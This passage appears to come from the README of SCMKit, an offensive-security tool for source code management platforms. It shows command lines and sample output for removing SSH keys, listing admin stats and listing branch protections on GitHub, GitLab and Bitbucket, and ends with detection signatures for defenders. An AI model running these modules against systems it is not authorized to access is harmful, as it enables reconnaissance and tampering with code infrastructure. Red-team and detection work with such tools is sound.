SCMKit.exe -s github -m removesshkey -c apiToken -u https://github.something.local -o sshKeyID

GitLab Enterprise

You have to provide the SSH key ID to remove. This ID was shown whenever you created the SSH key and is also shown when listing SSH keys.

SCMKit.exe -s gitlab -m removesshkey -c userName:password -u https://gitlab.something.local -o sshKeyID

SCMKit.exe -s gitlab -m removesshkey -c apiToken -u https://gitlab.something.local -o sshKeyID

Bitbucket Server

Only username/password auth is supported to perform actions not related to repos or projects in Bitbucket. You have to provide the SSH key ID to remove. This ID was shown whenever you created the SSH key and is also shown when listing SSH keys.

SCMKit.exe -s bitbucket -m removesshkey -c userName:password -u https://bitbucket.something.local -o sshKeyID

Example Output

C:\>SCMKit.exe -s bitbucket -m removesshkey -u http://bitbucket.hogwarts.local:7990 -c username:password -o 16

Module: removesshkey
System: bitbucket
Auth Type: Username/Password
Options: 16
Target URL: http://bitbucket.hogwarts.local:7990

Timestamp: 2/7/2022 1:48:03 PM

[+] SUCCESS: The SSH key of ID 16 was successfully revoked.

List Admin Stats

Use Case

List admin stats in GitHub Enterprise


Provide the adminstats module, along with any relevant authentication information and URL. Site admin access in GitHub Enterprise is required to use this module

GitHub Enterprise

SCMKit.exe -s github -m adminstats -c userName:password -u https://github.something.local

SCMKit.exe -s github -m adminstats -c apikey -u https://github.something.local

Example Output

C:\>SCMKit.exe -s github -m adminstats -c username:password -u https://github-enterprise.hogwarts.local

Module: adminstats
System: github
Auth Type: Username/Password
Target URL: https://github-enterprise.hogwarts.local

Timestamp: 1/14/2022 9:45:50 PM

Admin Users | Suspended Users | Total Users
1 | 0 | 5

Total Repos | Total Wikis
4 | 0

Total Orgs | Total Team Members | Total Teams
1 | 0 | 0

Private Gis ts | Public Gists
0 | 1

List Branch Protection

Use Case

List branch protections in GitHub Enterprise


Provide the protection module, along with any relevant authentication information and URL. Optionally, supply a string in the options parameter to return matching results contained in repo names

GitHub Enterprise

SCMKit.exe -s github -m protection -c userName:password -u https://github.something.local

SCMKit.exe -s github -m protection -c apikey -u https://github.something.local

SCMKit.exe -s github -m protection -c apikey -u https://github.something.local -o reponame

Example Output

C:\>.\SCMKit.exe -u http://github.hogwarts.local -s github -c apiToken -m protection -o public-r

Module: protection
System: github
Auth Type: API Key
Options: public-r
Target URL: http://github.hogwarts.local

Timestamp: 8/29/2022 2:02:42 PM

Repo | Branch | Protection
public-repo | dev | Protected: True
Status checks must pass before merge:
Branch must be up-to-date before merge: True
Owner review required before merge: True
Approvals required before merge: 2
Protections apply to repo admins: True
public-repo | main | Protected: False


Below are static signatures for the specific usage of this tool in its default state:

  • Project GUID - {266C644A-69B1-426B-A47C-1CF32B211F80}
  • User Agent String - SCMKIT-5dc493ada400c79dd318abbe770dac7c
  • Access Token & SSH Key Names - Access tokens and SSH keys that are created using the tool are prepended with SCMKIT- for the name.

For detection guidance of the techniques used by the tool, see the X-Force Red blog post.

